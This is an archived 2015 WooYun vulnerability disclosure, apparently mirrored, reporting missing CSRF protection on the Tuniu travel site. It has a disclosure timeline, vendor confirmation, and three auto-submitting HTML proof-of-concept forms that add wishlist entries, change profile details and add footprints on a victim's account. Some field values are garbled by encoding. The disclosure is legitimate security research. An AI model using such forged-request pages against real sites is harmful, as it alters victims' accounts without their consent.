乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-24: 细节已通知厂商并且等待厂商处理中 2015-06-24: 厂商已经确认,细节仅向厂商公开 2015-07-04: 细节向核心白帽子及相关领域专家公开 2015-07-14: 细节向普通白帽子公开 2015-07-24: 细节向实习白帽子公开 2015-08-08: 细节向公众公开
妹子说要去旅游,旅游计划是按照途牛的“想去”来的,一看,要是能来我的城市多好哇,接下来就是见证奇迹的时刻(附暴漫~)
第一次传这么长的图,不知道会不会不清楚
POC1(想去,执行后会在http://www.tuniu.com/person/ 显示,需要等一会,多刷新几次):
<html> <body> <form action="http://www.tuniu.com/yii.php?r=guide/travelnotes/travelUser" method="POST"> <input type="hidden" name="poiId" value="3922" /> <input type="hidden" name="type" value="wantUser" /> </form> <script> document.forms[0].submit(); </script> </body></html>
POC2(修改资料):
<html> <body> <form action="http://www.tuniu.com/yii.php?r=person/personpage/ajaxSaveUserInfo" method="POST"> <input type="hidden" name="nickname" value="justfun" /> <input type="hidden" name="mood" value="justfun" /> <input type="hidden" name="proCode" value="1200" /> <input type="hidden" name="cityCode" value="1211" /> </form> <script> document.forms[0].submit(); </script> </body></html>
POC3(增加足迹):
<html> <body> <form action="http://www.tuniu.com/yii.php?r=person/personpage/ajaxAddFootprint" method="POST"> <input type="hidden" name="obj[id]" value="4000" /> <input type="hidden" name="obj[name]" value="ижž?´²" /> <input type="hidden" name="obj[x]" value="0" /> <input type="hidden" name="obj[y]" value="0" /> <input type="hidden" name="obj[list][0][id]" value="4051" /> <input type="hidden" name="obj[list][0][name]" value="?´¥?·´?¸ƒижŸ¦" /> <input type="hidden" name="obj[list][0][x]" value="-17.685900" /> <input type="hidden" name="obj[list][0][y]" value="30.300301" /> <input type="hidden" name="obj[type]" value="foreign" /> </form> <script> document.forms[0].submit(); </script> </body></html>
完全不防御CSRF?
危害等级:中
漏洞Rank:7
确认时间:2015-06-24 09:48
感谢白帽子关注途牛安全,我们正安排修复
暂无
